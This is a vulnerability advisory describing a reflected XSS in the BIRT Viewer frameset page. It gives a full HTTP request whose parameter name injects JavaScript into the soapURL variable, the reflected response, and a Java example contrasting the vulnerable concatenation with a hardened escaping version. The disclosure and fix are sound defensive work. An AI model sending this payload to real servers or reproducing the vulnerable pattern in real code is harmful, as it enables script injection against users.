A reflected XSS exists in the frameset viewer of the BIRT Viewer component. Issuing an HTTP POST to the frameset viewer page with a malicious query parameter whose name starts with __ causes that parameter name to be reflected, unescaped, in the resulting response as part of the soapURL JavaScript variable.

Example request:

> POST /viewer/frameset?__report=my_report.rptdesign&__test%22%3Balert%28%27XSS%27%29%3B%20var%20fake%3D%22=value HTTP/1.1
> Host: localhost
> Connection: close
> Content-Length: 0
> Cache-Control: max-age=0
> Upgrade-Insecure-Requests: 1
> Content-Type: application/x-www-form-urlencoded
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
> Sec-Fetch-Mode: nested-navigate
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
> Sec-Fetch-Site: cross-site
> Accept-Encoding: gzip, deflate
> Accept-Language: en-US,en;q=0.9
> Cookie: ...

Truncated response:

> <script type="text/javascript">
>
> var soapURL = "https://localhost/viewer/frameset?__test";alert('XSS'); var fake="=value&__report=my_report.rptdesign";
>
> var rtl = false;
> </script>

The double quote in the decoded parameter name terminates the soapURL string literal, so the remainder of the name is executed as JavaScript. The issue is due to the way BirtSoapMessageDispatcherServlet generates the soapURL request attribute:

https://github.com/eclipse/birt/blob/173e7170d3a5b8e76a6dd629607205a94213fed5/viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/servlet/BirtSoapMessageDispatcherServlet.java#L201
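The following is an added example, not BIRT's own code: a hypothetical SoapUrlBuilder that contrasts the reflection pattern described above (raw query string concatenated into a JS string literal) with a hardened version that URL-encodes each parameter name and value and then escapes the result for a double-quoted JavaScript string. The base URL and parameter map are constructed inputs mirroring the report.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical helper for illustration only; BIRT's servlet builds soapURL differently.
public final class SoapUrlBuilder {

    // Pattern behind the report: the raw query string (including parameter names) lands in a JS literal.
    static String vulnerableSoapUrl(String base, String rawQueryString) {
        return "var soapURL = \"" + base + "?" + rawQueryString + "\";";
    }

    // Hardened: encode names and values for the URL, then escape the whole URL for the JS string context.
    static String hardenedSoapUrl(String base, Map<String, String> params) {
        StringBuilder qs = new StringBuilder();
        for (Map.Entry<String, String> e : params.entrySet()) {
            if (qs.length() > 0) qs.append('&');
            qs.append(URLEncoder.encode(e.getKey(), StandardCharsets.UTF_8))
              .append('=')
              .append(URLEncoder.encode(e.getValue(), StandardCharsets.UTF_8));
        }
        return "var soapURL = \"" + escapeJsString(base + "?" + qs) + "\";";
    }

    // Escape so the value can only be string data inside "...": quotes, backslash, HTML-significant
    // characters (prevents a </script> breakout) and control characters become \\uXXXX escapes.
    static String escapeJsString(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            if (c == '"' || c == '\'' || c == '\\' || c == '<' || c == '>' || c == '&' || c < 0x20) {
                out.append(String.format("\\u%04x", (int) c));
            } else {
                out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed input: the attacker-controlled part is the parameter *name*, as in the report.
        String base = "https://localhost/viewer/frameset";
        Map<String, String> params = new LinkedHashMap<>();
        params.put("__report", "my_report.rptdesign");
        params.put("__test\";alert('XSS'); var fake=\"", "value");
        String raw = "__report=my_report.rptdesign&__test\";alert('XSS'); var fake=\"=value";
        System.out.println(vulnerableSoapUrl(base, raw));   // string literal is terminated early
        System.out.println(hardenedSoapUrl(base, params));  // payload stays inert inside the literal
    }
}
```

URL-encoding alone already turns the quote into %22; the JS-string escaping is a second, independent layer so that any later change to how the query string is assembled does not reopen the script context.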